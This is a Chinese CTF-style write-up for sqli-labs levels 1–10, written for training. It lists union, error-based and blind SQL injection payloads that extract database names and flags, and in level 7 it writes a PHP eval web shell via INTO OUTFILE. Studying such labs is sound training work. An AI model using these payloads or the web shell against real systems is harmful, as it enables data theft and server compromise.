• sqli-labs 1-10关 wp

    最近在给协会的小朋友搞培训,顺手写了sqli-labs 1-10关的wp,就发出来一下吧。(做的时候环境是BUUCTF上面的basic的sqli-labs)

    Sql-labs

     

    第一关(字符型)

    • 判断是否存在注入:?id=1' and 1=2%23

    • 判断字段数:?id=1' order by 3%23

    • 判断回显:?id=-1' union select 1,2,3%23

    • 爆数据库名:?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23

    • 爆表名:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23

    • 爆字段:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23

    • 爆数据:?id=-1' union select 1,group_concat(flag),3 from ctftraining.flag%23

     

    第二关(数字型)

    • 判断是否存在注入:?id=1 and 1=2%23

    • 判断字段数:?id=1 order by 3%23

    • 判断回显:?id=-1 union select 1,2,3%23

    • 爆数据库名:?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata%23

    • 爆表名:?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23

    • 爆字段:?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23

    • 爆数据:?id=-1 union select 1,group_concat(flag),3 from ctftraining.flag%23

     

    第三关(单引号加括号型)

    • 判断是否存在注入:?id=1') and 1=2%23

    • 判断字段数:1') order by 3%23

    • 判断回显:?id=-1') union select 1,2,3%23

    • 爆数据库名:?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata%23

    • 爆表名:?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23

    • 爆字段:?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23

    • 爆数据:?id=-1') union select 1,group_concat(flag),3 from ctftraining.flag%23

     

    第四关(双引号加括号型)

    • 判断是否存在注入:?id=1") and 1=2%23

    • 判断字段数:?id=1") order by 3%23

    • 判断回显:?id=-1") union select 1,2,3%23

    • 爆数据库名:?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata%23

    • 爆表名:?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23

    • 爆字段:?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23

    • 爆数据:?id=-1") union select 1,group_concat(flag),3 from ctftraining.flag%23

     

    第五关(报错注入或字符型盲注)

     
    报错注入

    • 判断是否存在注入:?id=1'

    • 爆数据库:?id=1' and updatexml(1,concat('~',substr((select group_concat(schema_name) from information_schema.schemata),1,31),'~'),1)%23

    • 爆数据表:?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),'~'),1)%23

    • 爆字段:?id=1' and updatexml(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),1,31),'~'),1)%23

    • 爆数据:

    • ?id=1' and updatexml(1,concat('~',substr((select group_concat(flag) from ctftraining.flag),1,31),'~'),1)%23

    • ?id=1' and updatexml(1,concat('~',substr((select group_concat(flag) from ctftraining.flag),32,64),'~'),1)%23

    盲注

    • 判断是否存在注入:?id=1' and 0%23

    • 判断数据库名长度:1' and (length((select group_concat(schema_name) from information_schema.schemata))>69)%23

    • 爆数据库名:?id=1' and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23

    • 爆表名:?id=1' and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23

    • 爆字段:?id=1' and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23

    • 爆数据:?id=1' and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23

     

    第六关(双引号字符型盲注)

    • 判断是否存在注入:?id=1"and 0 %23

    • 判断数据库名长度:?id=1" and (length((select group_concat(schema_name) from information_schema.schemata))>68)%23

    • 爆数据库名:?id=1" and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23

    • 爆表名:?id=1" and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23

    • 爆字段:?id=1" and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23

    • 爆数据:?id=1" and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23

     

    第七关(写shell)

    • 写shell:?id=0')) union select null,0x3c3f706870206576616c28245f504f53545b225968636b225d293b3f3e,null into outfile '路径/0.php' --+

     

    第八关(字符型盲注)

    • 判断是否存在注入:?id=1' and 0%23

    • 判断数据库名长度:1' and (length((select group_concat(schema_name) from information_schema.schemata))>69)%23

    • 爆数据库名:?id=1' and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23

    • 爆表名:?id=1' and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23

    • 爆字段:?id=1' and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23

    • 爆数据:?id=1' and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23

     

    第九关(单引号字符型时间盲注)

    • 判断是否存在注入:?id=1' and sleep(5)%23

    • 判断数据库名长度:?id=1' and (if((length((select group_concat(schema_name) from information_schema.schemata))>68),sleep(5),0))%23

    • 爆数据库名:?id=1' and (if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1),sleep(5),0))%23

    • 爆表名:?id=1' and (if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100),sleep(5),0))%23

    • 爆字段:?id=1' and (if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>1),sleep(5),0))%23

    • 爆数据:?id=1' and (if((ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100),sleep(5),0))%23

     

    第十关(双引号字符型时间盲注)

    • 判断是否存在注入:?id=1" and sleep(5) %23

    • 判断数据库名长度:?id=1" and (if((length((select group_concat(schema_name) from information_schema.schemata))>68),sleep(5),0))%23

    • 爆数据库名:?id=1" and (if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1),sleep(5),0))%23

    • 爆表名:?id=1" and (if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100),sleep(5),0))%23

    • 爆字段:?id=1" and (if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>1),sleep(5),0))%23

    • 爆数据:?id=1" and (if((ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100),sleep(5),0))%23
  • 相关阅读:
    vue.js3: 旋转图片并保存(vue@3.2.37)
    vue.js3: 图片的反色/灰度(黑白)/褐色并保存(vue@3.2.37)
    chrome:配置console控制台显示时间戳(chrome 105.0.5195.102)
    vue.js3:图片镜像(翻转)并保存(vue@3.2.37)
    vue.js3: 多张图片合并(vue@3.2.37)
    javascript:null和undefined的区别(chrome 104.0.5112.101)
    文本多行替换
    FreeRTOS 多核通信MessageBuffer
    IAR Visual State 状态机 代码生成
    C/C++编译器支持 __FILE_NAME__ 获取文件名,不显示文件路径
  • 原文地址:https://www.cnblogs.com/Yhck/p/13937402.html
Copyright © 2020-2023  润新知